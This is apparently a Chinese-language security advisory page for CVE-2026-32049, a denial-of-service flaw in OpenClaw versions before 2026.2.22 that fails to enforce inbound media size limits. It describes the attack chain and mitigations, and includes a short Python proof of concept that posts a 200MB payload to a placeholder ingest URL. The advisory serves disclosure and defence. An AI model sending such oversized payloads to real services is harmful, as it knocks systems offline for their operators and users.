CVE-2026-32049 CVSS 7.5 高危

CVE-2026-32049 OpenClaw 拒绝服务漏洞

披露日期: 2026-03-21

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-32049

漏洞类型

拒绝服务

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw 2026.2.22之前的版本存在安全漏洞，无法在多个通道摄入路径中强制执行入站媒体字节限制。攻击者可利用此缺陷发送超大媒体载荷，导致目标系统内存使用量激增并引发进程不稳定。

技术细节

该漏洞是由于OpenClaw在处理远程媒体缓冲时，未能在多个通道摄入路径上一致地强制执行配置的入站媒体字节限制。攻击者无需用户交互或身份认证，即可通过网络向受影响设备发送特制的超大媒体数据包。由于系统在缓冲数据前缺乏有效的校验机制，接收并处理这些超大数据包会消耗大量系统资源，导致内存耗尽或服务进程崩溃，从而实现拒绝服务攻击。

攻击链分析

STEP 1

1. 信息收集

攻击者识别网络上运行OpenClaw且版本低于2026.2.22的目标。

STEP 2

2. 漏洞利用

攻击者向目标媒体的接收接口发送特制的超大媒体数据包。

STEP 3

3. 资源耗尽

目标系统在缓冲该数据包时未执行大小限制，导致内存被大量占用。

STEP 4

4. 拒绝服务

由于内存不足或进程不稳定，OpenClaw服务崩溃或停止响应。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL example
target_url = "http://target-ip:port/media/ingest"

# Generate an oversized payload to bypass limits and exhaust memory
# Sending a large payload to trigger the buffer overflow/memory exhaustion
oversized_payload = b"X" * (200 * 1024 * 1024)  # 200MB payload

try:
    print("[+] Sending payload to trigger DoS...")
    response = requests.post(target_url, data=oversized_payload, timeout=30)
    print(f"Status: {response.status_code}")
except Exception as e:
    print(f"[-] Exploit execution failed or service down: {e}")

影响范围

OpenClaw < 2026.2.22

防御指南

临时缓解措施

建议立即部署上游修复补丁。若暂时无法升级，应在网络边界设备（如WAF或反向代理）上配置严格的入站流量大小限制规则，拦截异常大的媒体数据包。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表